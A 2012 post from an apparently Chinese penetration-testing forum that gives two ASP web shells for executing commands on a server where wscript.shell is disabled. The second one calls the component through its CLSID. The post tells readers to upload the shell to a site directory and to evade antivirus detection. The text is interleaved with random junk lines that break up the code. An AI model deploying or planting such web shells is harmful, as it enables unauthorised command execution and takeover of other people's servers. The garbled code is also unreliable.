中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
$ ~' J2 [3 o; k. N$ B! S3 h/ w
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
! O- \% h- e! y4 G. P
要想让运行命令可以试试这种方法,成功率为五五之数。
$ C, d- B4 _5 _2 u) c2 y6 u
把下面代码复制:
3 g7 |" g9 P& _% P
<%
4 b/ J L5 t5 y8 Y7 k: J
end if
1 ?5 m! }7 y9 c) S8 _
response.write(”")
. ~5 o5 o* _' ^( b& @, e. @/ w
On Error Resume
6 h: A; y y& A8 c
Next
3 G; y% f8 ~& f5 l! u
response.write oScriptlhn.exec(”cmd.exe /c” &
5 O5 l- H7 C, n( N _0 q% D3 l7 W
request(”c”)).stdout.readall
2 K* G; _8 {; N6 l
response.write(”")
" Z7 m/ C+ T& ^- ]- D" q& Y% i# B
response.write(”")
2 v$ L9 }' N0 f# F4 w# I* _7 {
response.write(”
& Y0 K7 c6 v6 I* b) P7 D
“)
6 k, y% h0 k9 f' x% E. X
response.write(”")
9 G3 }: F' W2 k" q& A4 [
%>
6 [1 s% C1 f% r' i( Q: Z& t
保存为一个asp文件,然后传到网站目录上去
$ ]5 p x) J+ d3 j' O2 t
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
) C" r7 j% r$ z' [% V5 V4 F
我用此成功运行过cacls命令。
% H+ {& c6 E) B( _
第二那就是运行时出错,可能限制某些代码执行
" t" ?& x5 Z9 g& O- Y' ?3 ]
无wscript.shell组件提权又一个方法
O" d0 Z5 V' R* ]4 C/ r
<object runat=server id=oScriptlhn scope=page
; z# p" j7 ^% l( |. y3 N3 w
* P+ L( r0 u- f( A& Y
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
5 u2 o2 e6 C8 J. l
<%if err then%>
3 f! G9 @, U& r. I5 E
<object runat=server id=oScriptlhn scope=page
1 j$ {# s, W5 o' W$ B
- K4 N7 C/ d% \8 a. G
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
6 D: Z4 c2 O y6 N( o x
<%
7 H2 X V8 _& M4 A7 t
end if
1 X g2 O3 N# B* p1 X1 w
response.write(”<textarea readonly cols=80
) E6 M7 B8 V7 W1 ~3 N7 Q
# t# r# Y' T7 M4 k9 x# a* c: F- r# I
rows=20>”)
& d/ N2 Y# x5 N' q0 H& R+ L
On Error Resume Next
- Y- H& ~$ G9 K4 F
response.write
$ W1 U4 n+ G* b+ E
) u6 a0 W- F' l+ n6 u
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
* S# n: v/ ~. [& P
response.write(”</textarea>”)
. A: p7 S W, [1 j3 d" G
response.write(”<form
% p! f: R% k7 C; _
4 F# S- y2 n* e" \/ m
method=’post’>”)
8 W/ ^' T2 G) B J
response.write(”<input type=text name=’c'
7 E- B5 q( l+ _; j' d7 {
0 W( [3 \5 h" ?
size=60><br>”)
. K( f; ]* O9 e' a
response.write(”<input type=submit
7 Q& t$ A: J7 c, [# `' j
' d% K6 b" o) k
value=’执行’></form>”)
7 Z# i$ y. W. R, U( w
%>
$ f' R) R- R+ F7 j) u* Q
保存为ASP,此代码可能被杀,请注意免杀。
* }1 p; {+ g4 p* w
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
3 Y- X) r0 {7 y! Y5 a
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2